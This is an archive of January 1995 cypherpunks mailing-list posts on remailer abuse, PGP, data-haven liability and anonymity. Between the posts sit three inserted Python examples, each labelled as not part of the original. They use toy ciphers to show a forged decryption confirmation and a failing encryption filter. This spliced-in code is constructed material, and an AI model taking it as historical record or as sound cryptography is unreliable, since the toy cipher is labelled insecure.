> Fill out this form letter, get it notarized and send it to the address in
> the letterhead. Be prepared to wait and get jerked around. I have heard
> that some FOI requests have taken as long as two years to get back.

Although the FBI only have jurisdiction within the US, it is quite possible
that they would have files containing information about non-US nationals
if they were involved (perhaps even peripherally) in domestic FBI
investigations.

I wonder what would happen if a non-US citizen logged an FOI request?
Has anyone ever tried?

						Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Fri, 13 Jan 95 13:47:10 PST
To: cypherpunks@toad.com
Subject: retiring my remailer.. (fwd)
Message-ID: <199501132146.QAA13046@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From remailer-operators-owner@c2.org Tue Jan  3 10:21:42 1995
To: Remailer-Operators@c2.org
Message-Id: <199501031453.IAA02344@jpunix.com>
Subject: retiring my remailer..
Date: Tue, 03 Jan 1995 08:53:51 -0600
From: "John A. Perry" <perry@jpunix.com>

	The anonymous remailer at jpunix.com is going to shut down 
permanently shortly after I send this message. I spent my holidays 
fighting spams, running out of disk space because of spams and people 
sending HUGE binaries, and running out of swap space. 

	I have come to the ultimate conclusion that the Internet is not
mature or developed enough for remailers. The intended purpose has been
completely ignored while abuse is growing almost geometrically on a daily
basis. I have concluded that running a remailer on the Internet is like
giving a bunch of terrorists a nuclear bomb and then telling them "But
only use it for good!". There just doesn't seem to be much point in
thrashing my disks and computer to aid somebody in net abuse. I hardly
ever (never) see any use of the remailer for the purposes it was intended. 

BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 
30 seconds. The contents of the spam being passed thru my system 
essentially says:


          THIS IS A MAIL BOMB!!
          **** BOOM ***

See what I mean??

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.
 Finger remailer@jpunix.com for remailer help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Fri, 13 Jan 95 14:06:27 PST
To: cypherpunks@toad.com
Subject: Re: Multiple symetric cyphers
Message-ID: <9501132200.AA00870@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> Actually, a slight correction.  PGP does have an algorithm byte
> for the encryption algorithm; this byte is inside the RSA block.

It's got another algorithm byte - the stuff at the beginning that
says --- BEGIN PGP ENCRYPTED MESSAGE ---, letting everyone know
it's PGP.  That's one of the major risks of "algorithm bytes" -
not that it tells the Bad Guys which algorithm you're using,
but that it tells them "yes, this is crypto, not just noise".

		Bill		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 13 Jan 95 14:33:00 PST
To: bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Subject: State of PGP dll?; Encrypted session projects
In-Reply-To: <9501132200.AA00870@anchor.ho.att.com>
Message-ID: <m0rSpv2-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


What is the state of the Windows/.dll PGP libraries?

Does anyone have a usable version yet?


I've been thinking of trying to wedge pgp/encrypted session ability
into some of the socket proxy programs out there.

For Windows: twnsck12.zip, which is simple, is GNU, and has source and
by writing a relatively simple windows serial terminal emulator and
using Comt ($15 or 25 shareware) to convert it to a telnet client.
Both of these could be modified fairly easily.

I think Twinsock (Troy's winsock, twnsck12.zip) would be the first
to work on, since it would cover whatever clients you would want to use.

It also should tunnel through multiple telnets since by default it escapes
just about everything.

Term would be a good Unix-Unix equivalent target.

Does anyone have better ideas?  Any suggestions on login/key
exchange sequence?

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant      510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 13 Jan 95 18:00:08 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <v02110104ab3c75c9a6c6@[129.219.97.131]>
Message-ID: <199501140158.RAA03820@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ben.Goren@asu.edu

   That of the data haven operator being able to deny knowledge of the
   contents of files people send him. He'll only return files that, when
   operated on by a strong cryptographic algorithm, make sense. 

This idea doesn't work for the purpose intended.  I'll upload straight
ASCII.  When you ask for a decryption key, I'll make one up randomly,
apply the decryption algorithm to the flat text, and send that back to
you as a confirmation.

The real question is "Makes sense to whom?".  You can't enforce a
requirement of encryption, but you can make sure that you can't make
sense of most of it.

   As best I can tell, none of the previous suggestions guarantees that the
   file is unreadable.

You don't need a guarantee of unreadability.  What is needed is a
presumption that files were not read.  If they are unreadable, then
they weren't read, but there are other ways of creating that
assurance.

Eric
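
The forged confirmation described in the message above, worked through as an added example (not part of the original message or of any data haven software). It assumes the operator's check is "the stored file decrypts under the supplied key to data that matches the declared handful and hash"; the cipher is a toy 8-round Feistel network built on SHA-256 so the script needs only the standard library, and all function names are hypothetical.

```python
import hashlib
import os

BLOCK = 16          # block size in bytes of the toy cipher
HALF = BLOCK // 2
ROUNDS = 8


def _f(key, rnd, half):
    """Feistel round function: keyed SHA-256 truncated to half a block."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _crypt(key, data, decrypting):
    """Run every 16-byte block through the Feistel network (ECB, toy only)."""
    if len(data) % BLOCK:
        raise ValueError("data must be a whole number of blocks")
    out = bytearray()
    for off in range(0, len(data), BLOCK):
        l, r = data[off:off + HALF], data[off + HALF:off + BLOCK]
        if decrypting:
            for rnd in reversed(range(ROUNDS)):
                l, r = _xor(r, _f(key, rnd, l)), l
        else:
            for rnd in range(ROUNDS):
                l, r = r, _xor(l, _f(key, rnd, r))
        out += l + r
    return bytes(out)


def encrypt(key, data):
    return _crypt(key, data, False)


def decrypt(key, data):
    return _crypt(key, data, True)


def pad(text):
    """Space-pad to a whole number of blocks."""
    return text + b" " * (-len(text) % BLOCK)


def haven_accepts(stored, key, handful, plaintext_hash):
    """Assumed operator check: the stored file, decrypted under the supplied
    key, starts with the declared handful and matches the declared hash."""
    recovered = decrypt(key, stored)
    return (recovered.startswith(handful)
            and hashlib.sha256(recovered).digest() == plaintext_hash)


def honest_deposit(message, key=None, handful=None):
    """Prepend a random handful, encrypt, and keep handful, hash and key."""
    key = key or os.urandom(16)
    handful = handful or os.urandom(BLOCK)
    plaintext = handful + pad(message)
    return encrypt(key, plaintext), key, handful, hashlib.sha256(plaintext).digest()


def forged_deposit(ascii_text, key=None):
    """Store the readable text unchanged, then manufacture the evidence by
    running *decryption* over it under a made-up key."""
    stored = pad(ascii_text)
    key = key or os.urandom(16)
    fake_plaintext = decrypt(key, stored)
    return stored, key, fake_plaintext[:BLOCK], hashlib.sha256(fake_plaintext).digest()


def is_printable_ascii(data):
    return all(32 <= b < 127 for b in data)


if __name__ == "__main__":
    note = b"constructed sample: plain readable ASCII sitting on the haven"
    for name, deposit in (("honest", honest_deposit), ("forged", forged_deposit)):
        stored, key, handful, digest = deposit(note)
        print(name, "accepted:", haven_accepts(stored, key, handful, digest),
              "| stored file readable:", is_printable_ascii(stored))
```

Both deposits pass the same check, so passing it says nothing about whether the operator could have read what is on disk.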




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 13 Jan 95 18:33:06 PST
To: cypherpunks@toad.com (cypherpunks)
Subject: NIST Key Certification Document
Message-ID: <9501140231.AA11480@doom>
MIME-Version: 1.0
Content-Type: text/plain



At the RSA conference, I came across an interesting-looking tome
called _Federal Certification Authority Liability and Policy: Law and
Policy of Certificate-Based Public Key and Digital Signatures_.  It
seems that we can obtain this thing from NIST for a modest fee of $61,
but I'm wondering if there might be an online version around
somewhere.  Does anyone know?

--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 13 Jan 95 18:44:02 PST
To: cypherpunks@toad.com
Subject: Re: Reefer madness
Message-ID: <9501140244.AA29812@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



	Thanks for your replies about the
	Turkish prison films, and all,
	I think I comprehendo now.

	I did see the movie Airplane, but I
	somehow overlooked that salient
	point.


Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Fri, 13 Jan 95 19:00:20 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501140259.SAA13236@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 
>
>Fine.  The operator has no idea of how to make sense of this data
>format.  Just because someone in the world has an interpretation for
>it doesn't mean that I do.
>

The primary point that I'm trying to make is that there is no such thing 
as an algorithmic test for a dataset being in a 'state' of encryption.  
Such a test is beyond algorithmic capability (at least in our universe). 
Therefore, an RM/DH operator should just drop the pretense of filtering 
out non-encyphered submissions.  Just take what comes and tell customers 
that if they don't want you to read it, it's up to _them_ to make 
certain that you can't.  Period!  The DH operator could encypher all 
submissions with his own key so that the DH contents can't be 
compromised to outsiders.  This seems to be a much more real-world 
approach to the problem than tilting at windmills with encryption 
filters.  (The previous examples were an attempt to demonstrate, in a 
concrete way, the failure of any such algorithmic approach. Whatever 
encryption-test algorithm you come up with I guarantee you I can defeat 
it!)

Dale H.
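
One concrete instance of the point made in the message above, as an added example that is not part of the original post: a byte-entropy filter, the kind of statistical "is it encrypted?" test an operator might try, run over four constructed inputs. The 7.5 bits/byte threshold, the function names and the sample data are assumptions; os.urandom output stands in for real ciphertext, which such a test cannot tell from random bytes.

```python
import hashlib
import math
import os
from collections import Counter

THRESHOLD = 7.5  # bits per byte; assumed cut-off for the hypothetical filter


def byte_entropy(data):
    """Shannon entropy of the byte histogram, in bits per byte (0.0 to 8.0)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def filter_says_encrypted(data):
    return byte_entropy(data) >= THRESHOLD


def public_whiten(data):
    """XOR with a SHA-256 counter stream derived from a public constant.
    No secret is involved, so anyone, the operator included, can undo it."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(b"public-constant" + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def survey():
    """Return the filter's verdict for each constructed sample."""
    readable = b"Constructed sample text, readable by anyone who opens it.\n" * 70
    ciphertext = os.urandom(4096)  # stand-in for genuine ciphertext
    samples = {
        "readable text": readable,
        "readable text, publicly whitened": public_whiten(readable),
        "ciphertext, raw bytes": ciphertext,
        "ciphertext, hex-armoured": ciphertext.hex().encode(),
    }
    return {name: filter_says_encrypted(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, verdict in survey().items():
        print(f"{name:35s} -> filter says encrypted: {verdict}")
```

The filter passes text that anyone can recover and rejects genuine ciphertext once it is armoured for mail, so its verdict tracks byte statistics rather than whether the operator can read the file.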





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Fri, 13 Jan 95 03:06:37 PST
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: Reefer madness
In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com>
Message-ID: <Pine.SUN.3.91.950113190344.6394B-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Jan 1995, Blanc Weber wrote:

> From: Sandy Sandfort
> 
> Ever seen a Turkish prison film, Reuben?
> .........................................................
> 
> I don't get it.   (I haven't seen one)
> 
> Blanc
> 
"Have you ever seen a grown man naked?", I think that's how they put it 
in Airplane - Flying High, the movie from the early 80s I think, before 
going on with the Turkish prison bit.

Basically there is a lot of sex between the men in jails there, and 
mostly unwanted but forced.

Regds

PS if you get really stuck, you could ask your folks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Fri, 13 Jan 95 18:17:34 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110112ab3ce2e1362c@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:58 PM 1/13/95, Eric Hughes wrote:
>   From: Ben.Goren@asu.edu
>
>   That of the data haven operator being able to deny knowledge of the
>   contents of files people send him. He'll only return files that, when
>   operated on by a strong cryptographic algorithm, make sense.
>
>This idea doesn't work for the purpose intended.  I'll upload straight
>ASCII.  When you ask for a decryption key, I'll make one up randomly,
>apply the decryption algorithm to the flat text, and send that back to
>you as a confirmation.
>[. . .]

Damn. I hate it when I overlook the obvious.

Still, I'd like to think there's an answer. Perhaps I'll keep thinking on it.

>Eric

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 13 Jan 95 17:21:29 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501140112.AB29647@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 PM 1/12/95 -0600, Larry E wrote:
> ...
>         (1) the people who use the remailer, who get a measure of 
>             comfort from knowing their communication is secure

They know it's secure because they made it secure.  If they don't care, I 
don't particularly see why the remailer should care.

>         (2) legal groups etc. who may try to hold the remailer 
>             liable in some way for what passes through their remailer.

It strikes me that this is a very weak defense.  Legal beagles will probably 
argue that the remailer should have either prohibited encrypted 
communications or else was in collusion with the sending party.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Fri, 13 Jan 95 17:30:24 PST
To: cypherpunks@toad.com
Subject: Re: C'punks slogan? - Private Replies s'il vous plait
In-Reply-To: <Pine.3.89.9501131615.A7216-0100000@eis.calstate.edu>
Message-ID: <199501140130.UAA26305@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Joshua M. Sled <jsled@ctp.org>, <jsled@free.org> writes:
> Mostly because I'm looking at having bumper stickers made, and partly 
> because I'm testing a procmail script :), I want a few suggestions for a 
> good slogan for the C'punks, something that would look good on a bumper 
> sticker... 

Lest we suffer a recurrence of the C'punks Logo thread, which generated a
whole raft of list traffic which would have been better kept private, please
reply directly to Joshua and not to the whole list. [He seems to imply that
he wants private replies ("testing procmail") anyway, but I want to encourage 
this practice explicitly.]

Thanks

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Goren <ben@Tux.Music.ASU.Edu>
Date: Fri, 13 Jan 95 21:06:55 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501140428.XAA14570@bb.hks.net>
Message-ID: <Pine.3.89.9501132124.A14451-0100000@Tux.Music.ASU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


OK. If this isn't the solution, it at least makes it past Eric's last 
objection.

Alice hashes her file and uses that hash as the key to encrypt the file.
She sends the file to Dave, and sends the original hash when she wants it
back. Dave decrypts, and confirms the hash. 

Unfortunately, this still doesn't quite close the loop--Dave knows the
contents of the file once Alice sends the key. It does, however, make it
very difficult for Dave to know anything about Alice's file. In a
real-world implementation, Dave is going to want to get the file back to
Alice as quickly as possible, since that's part of what she's paying for. 
Scanning the file as it leaves will slow down delivery--especially if it's
"suspicious" and must get routed to a human--so it's uneconomical for Dave
to do anything until later. Once he's returned the file, the deed has been
done, and it does little good to know that Alice was hoarding plans to
build a nuke, as she's got them back again--the cat's out of the bag. 

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.
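
The hash-as-key exchange described in the message above, as an added example that is not part of the original post. The SHA-256 keystream cipher and the use of the ciphertext hash as a file id are assumptions chosen so the sketch runs with the standard library only; the last function also shows that the scheme is deterministic, so a holder of the ciphertext can confirm a guess at the plaintext.

```python
import hashlib
import hmac
import os


def stream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher (assumption): XOR with SHA-256(key || counter) blocks.
    Encryption and decryption are the same operation. Illustration only."""
    out = bytearray()
    for block_no in range((len(data) + 31) // 32):
        pad = hashlib.sha256(key + block_no.to_bytes(8, "big")).digest()
        chunk = data[block_no * 32:(block_no + 1) * 32]
        out.extend(c ^ p for c, p in zip(chunk, pad))
    return bytes(out)


def alice_encrypt(plaintext: bytes):
    """Alice hashes her file and uses that hash as the encryption key."""
    key = hashlib.sha256(plaintext).digest()
    return key, stream_xor(key, plaintext)


class DataHaven:
    """Dave's side: stores opaque blobs, releases one only on a valid hash."""

    def __init__(self):
        self._files = {}

    def deposit(self, blob: bytes) -> str:
        # File id = hash of the stored blob (assumption; the post names no id).
        file_id = hashlib.sha256(blob).hexdigest()
        self._files[file_id] = blob
        return file_id

    def retrieve(self, file_id: str, claimed_hash: bytes):
        """Decrypt with the claimed hash, then confirm the result hashes to it."""
        blob = self._files.get(file_id)
        if blob is None:
            return None
        candidate = stream_xor(claimed_hash, blob)
        if hmac.compare_digest(hashlib.sha256(candidate).digest(), claimed_hash):
            return candidate
        return None  # a made-up key cannot satisfy hash(decrypt(blob)) == key


def dave_confirms_guess(stored_blob: bytes, guessed_plaintext: bytes) -> bool:
    """Same plaintext always gives the same blob, so a guess can be checked
    without ever receiving the key."""
    return alice_encrypt(guessed_plaintext)[1] == stored_blob


if __name__ == "__main__":
    secret = b"constructed sample file: ledger entries, January 1995\n" * 20
    key, blob = alice_encrypt(secret)
    haven = DataHaven()
    file_id = haven.deposit(blob)
    print("owner retrieves:", haven.retrieve(file_id, key) == secret)
    # The earlier objection: upload plain ASCII, then invent a key at random.
    ascii_id = haven.deposit(b"straight ASCII upload (constructed sample)")
    print("random key accepted:",
          haven.retrieve(ascii_id, os.urandom(32)) is not None)
    print("guess confirmed:", dave_confirms_guess(blob, secret))
```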





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Fri, 13 Jan 95 23:00:33 PST
To: downey@cs.netcom.com
Subject: Draft of editorial to SF Chronicle
Message-ID: <199501140623.WAA14448@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Chaos and Anonymity keep the Internet Vital

I could not let Martha Siegel's editorial ("Anarchy, Chaos on the
Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed
reader, her arguments may seem plausible. However, her distortions
give a picture of the Internet quite at odds with the true nature of
the Net. Her views are by no means representative of those who
actually use the Net. Of the dozens of messages I saw in response to
the editorial, not a single one was in favor of her proposals.

As Ms. Siegel correctly points out, the Net is not governed by any one
individual person or organization. Rather, it is collectively run by
those who use it as part of their daily lives. The operation of each
Internet node is subject to the individual judgement of the people who
own it. Ms. Siegel is wrong, however, in believing that such a state
of affairs is intolerable. Rather, this state of affairs has brought us
a remarkable flowering of discourse, ideas and culture, which is just
now beginning to be recognized in the mainstream press.

In a lawyer's dream world, there is a rule covering every action in
every situation, along with a well-functioning system to enforce the
rules. This is the exact opposite of the spirit of the Net, and of
Usenet in particular. Rather, there has evolved an informal set of
guidelines for promoting open, civil discourse, collectively known as
"netiquette." These guidelines may seem arcane to newcomers, but
basically they simply ask people who use the Net to be considerate of
other people, their time and their resources. A violation of
netiquette brings on not legal action, but responses pointing out why
the action was inconsiderate. Continued violation brings on ridicule
and scorn -- people who engage in this are considered to be either
sociopathic or just obnoxiously self-promoting.

The single most infamous breach of netiquette in Usenet history was
almost certainly the "green card spam," in which thousands of
advertisements for green card services were posted to completely
unrelated message areas, or "newsgroups." Advertisements presented in
a way considerate to others are tolerated and even welcomed on the
Net. Posting thousands of copies, though, is just going too far.
Negative response was immediate. The perpetrators were asked to stop,
but they refused to. One Norwegian hacker took it upon himself to
track down and "cancel" the offending messages. Most people on the Net
considered this to be entirely appropriate.

A number of other self-promoting hucksters have sensed an opportunity,
and have performed similar spams. In response, the Net evolved a
defense mechanism to counter these spams and minimize the damage. The
person currently serving this role is known by the pseudonym
"CancelMoose." Almost everyone on the Net supports this effort, and
agrees that it improves the overall value of Usenet.

Who was responsible for the original green card spam? Why, Ms. Siegel
herself, the same one who is complaining about "chaos and anarchy."
Chaos, anarchy, and anonymity are a large part of what keeps the Net
so vital.

Particularly galling is Ms. Siegel's appeal to free speech. Usenet in
its present form is perhaps the most conducive forum for free speech
in history. The threat to free speech is not from chaos or anonymity,
but from the sorts of changes that Ms. Siegel proposes.

Usenet is astonishingly effective in getting around the practical
barriers to free speech. These barriers come in many forms, including
libel, trademark, and copyright laws, fear of retribution, etc.
Because of its decentralized, communal nature, Usenet resists direct
attempts to censor. The main tool for circumventing these more
indirect barriers is anonymity.

As an example of such barriers, take the t-shirt commemorating the
green card incident. It was emblazoned with the words, "Green Card
Lawyers - Spamming the Globe" and a fist clutching a green card.
Shortly after the shirt was proposed, Canter & Siegel threatened to
sue if the shirt was in fact produced. It was only after several
outraged lawyers promised to defend against such a case pro bono that
I and others could be proud owners.

Or take one of the sexual abuse recovery newsgroups, where anonymity
is the norm. If someone were to post a message asking for support,
saying "my uncle did it" under their real name, they would be
vulnerable to a libel suit from said uncle. On the other hand, if they
used an anonymous service such as the one in Finland, they would not
simply escape punishment for the libel, but prevent it from happening
at all.

In many countries (and even China is on the Net these days), writings
critical of the government, such as exposure of human rights abuses,
are illegal. The authors face imprisonment, torture and death. By
posting anonymously to the Net, the information can be brought safely
to the attention of the world.

Not all anonymous messages are pleasant or popular. Unpopular speech
is a necessary consequence of free speech. At least to the founders of
this country, the benefits of free speech outweigh the discomfort. Our
founding fathers were also comfortable with anonymity -- the
Federalist papers were originally published under the pseudonym
Publius, because the authors felt the ideas should be evaluated on
their own.

Judging from the materials already published by Ms. Siegel, an
Internet built according to her vision would be free of such disturbing
ideas, but would readily support five hundred channels of green card
ads, impassioned pleas to purchase American flag plaques, and, yes,
anonymous testimonials for radial keratotomy specialists.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 13 Jan 95 20:23:50 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501140428.XAA14570@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>    From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

>    Paco begins by 
>    inventing the new [format] of which only Paco knows the internals.

Eric Hughes replied:

> No operator of any data service can be expected to know about every
> data interpretation.  The key here is "good faith".  An operator can
> undertake a good faith effort to remain ignorant about content.

While this may be possible, the argument that someone actively tried to
remain uninformed about something "dangerous" or potentially "illegal"
doesn't seem like a particularly strong defense. Someone with proper
credentials might want to comment on whether intentional ignorance is
sufficient to avoid culpability.

=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxdS6yoZzwIn1bdtAQHHYQF/Qe+7AcXH5ub+BMEY91hjbKNwGGUEho5o
CN63jwJ4NQYBcLHwhhu9Q+b1wTE9hMrB
=lSSE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@gate.net
Date: Fri, 13 Jan 95 20:38:20 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: How do I know if its encrypted?
Message-ID: <199501140437.XAA14922@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text


I accidentally sent a reply to Ben's letter solely to him.  He responds here
to the major points I brought up.  I'm forwarding it here with his permission.

Ben's text begins

At 8:11 AM 1/13/95, jpb@gate.net wrote:
>Ben.Goren@asu.edu said
>> Here's a solution:
>>
>> Alice sends a file to Dave's DataHaven. When Alice wants her file back, she
>> sends to Dave a secure hash of the file, a key with which to decrypt it,
>> and a handful of plaintext at the beginning of the file. Dave decrypts the
>> file that matches the hash with the key Alice gave him; if the file begins
>> as Alice says it should, Dave returns the file to Alice.
>
>If Alice initially encrypts the file to herself, and then encrypts it to Dave
>(Dave doesn't accept non-encrypted files), Dave doesn't need to decrypt it.
>If Dave even *can* decrypt it, and makes a policy of decryption, he is
>setting himself up for legal liability.
>
>Dave should allow anyone who can provide the MD5 of the cyphertext, the
>fileid and the fee to retrieve the file.  Retrieval requests will of course
>also require a pgp key to encrypt the file to and an anonymous remailer block.

I address this somewhat further in a response to Eric Hughes on the list.
Basically, Dave wants to make sure that he can't see what's in the file. My
scheme guarantees that the file is unreadable to anybody but the owner
until the owner asks for it back. If return of the file is automated,
Dave'll never know what's in it. Alice should, of course, further protect
her data if she feels the need.

>> This way, only those people who have an intimate knowledge of the files can
>> recover them.
>
>I agree that this is a good thing to enforce.
>
>> Dave can have a policy whereby he deletes a file after returning it, unless
>> Alice pays more to keep it there. Thus, Bad Bobby can send his naughty
>> pictures to Dave, tell the 'net how to get them--but the first person who
>> neglects to include the fee to leave the pictures there winds up blocking
>> out everybody else. Similarly, Samaritan Sam could get into a spending war
>> with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file
>> without paying for its continued storage--and takes a sneak peek at the
>> pictures before deleting them himself.
>
>This is a bad policy for Dave from a financial point of view.  If Alice pays
>for a 30 day storage, it should stay there for 30 days.  This means that Dave
>also needs to require an owner-password when the file is initially stored,
>but that is no big deal.

Change the payment structure a little and you don't have those worries.
Alice doesn't pay for thirty day storage, but rather pays for at least
thirty day storage. If she thinks she'll be getting the file back in
fifteen days, she only pays for that long. If she needs it for longer than
that, she sends another payment before the file expires.

>In a perfect world, Alice could specify an extra retrieval charge over and
>above Dave's, and the DH would enforce this and pass the extra money on to
>Alice.  This would allow for information sale when neither party trusts the
>other - Alice and Bob can agree on a fee for the file through anonymous means,
>and once it is set, Bob can send in the cash and be sure the file will be
>sent.

That's the job of a data broker, not a data haven. Dave might well wish to
offer that service, too, but, if I were him, I'd keep the two obviously
separate.

>Whether or not the file is what it is advertised to be is a whole
>new problem that can't be solved securely in software.

Not without an awfully good AI....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 14 Jan 95 08:59:18 PST
To: cypherpunks@toad.com
Subject: Gateways to the infosphere
Message-ID: <gate.i0iwyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Here I argue that universal service is unnecessary even for equal distribution
of information age opportunity, if one drops the 'highway' metaphor which, as I
argued in the last episode, is lousy. This one also points out the advantage
and use of demand-driven markets in widening access - Bombay slum-dwellers 
without clean water buy colour TVs and VCRs. For info on back issues, send a
blank message with 'get help' (without the quotes) as the Subject to
rishab@arbornet.org (do NOT 'r'eply to _this_ message).
--------cut here--------
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#43, 9/January/1995: Gateways to the infosphere

Asimov once wrote of a universe where intelligent life was
intelligence alone, roaming the avenues of pure thought
divorced from all physical form. To reach the infosphere
with your feet still on this planet though, you need a
point of access, a gateway to what could easily become
another world in your life. The nature of these gateways,
their availability and their owners are among the more
contentious aspects of the global information
infrastructure.

The task of developing this infrastructure to the point of
ubiquity has been compared to the construction of road
networks - any place, however remote, must be connected to
every other. As this would make little economic sense for
private investors, the task had to be one for the
government. Present-day governments are poor, so they
insist that subsidies should come from business in the
form of universal service: providing the same thing at the
same prices everywhere.

The rationale for this is noble - equal opportunity to
all. Without roads people can't get anywhere, literally
and economically, and the same must be true for
information highways. But if the info-highway is actually
an information ocean, the situation changes dramatically.
It is no longer necessary to move from place to place, but
simply to dive in.

This is true even in practical terms. On a highway, the
route traffic takes is important, because of the distance,
while on the Internet routing is a very low-level,
technical sort of thing, as data may travel in little
pieces on different paths, ignoring geographical distance.
Moreover, a highway needs a physical connection between
any two points, which affects costs, while the infosphere
floats above waiting to be reached through a satellite
transceiver from just anywhere.

Nor will the lack of universal service lead to a society
of information haves and have-nots. Information is unique
in that one doesn't 'have' it. It is created, and a 'have-
not' can easily become a 'have'. The possible inequality
is in trading information resources, in knowledge
opportunities. However, especially in the field of
information, people are not equally equipped to take
advantage of opportunities, however unequally distributed
the latter may be. Instead of demanding universal service,
governments should encourage the development of
infrastructure where it will be best used, which is in the
interests of business, anyway.

Unfortunately even telecom corporations have an incorrect
perception of who the best users are. They believe in
connecting those who can pay now for services, rather than
the many more who would benefit and therefore be able to
pay the most, once they exploit currently non-existent
opportunities.

Demand-driven markets grow fastest, though companies right
now seem to be more interested in shoving interactive
television down the eyes of the reluctant and rather bored
elite. A demand-driven information market is harder to
work with, as prospective buyers (as also the sellers)
have to be convinced of the benefits of technology. But
the potential markets are huge, if far from the minds of
the vendors of 'convergence' technology, as people's
information (or entertainment) needs are often more basic
than their material needs - just look at Bombay slum-
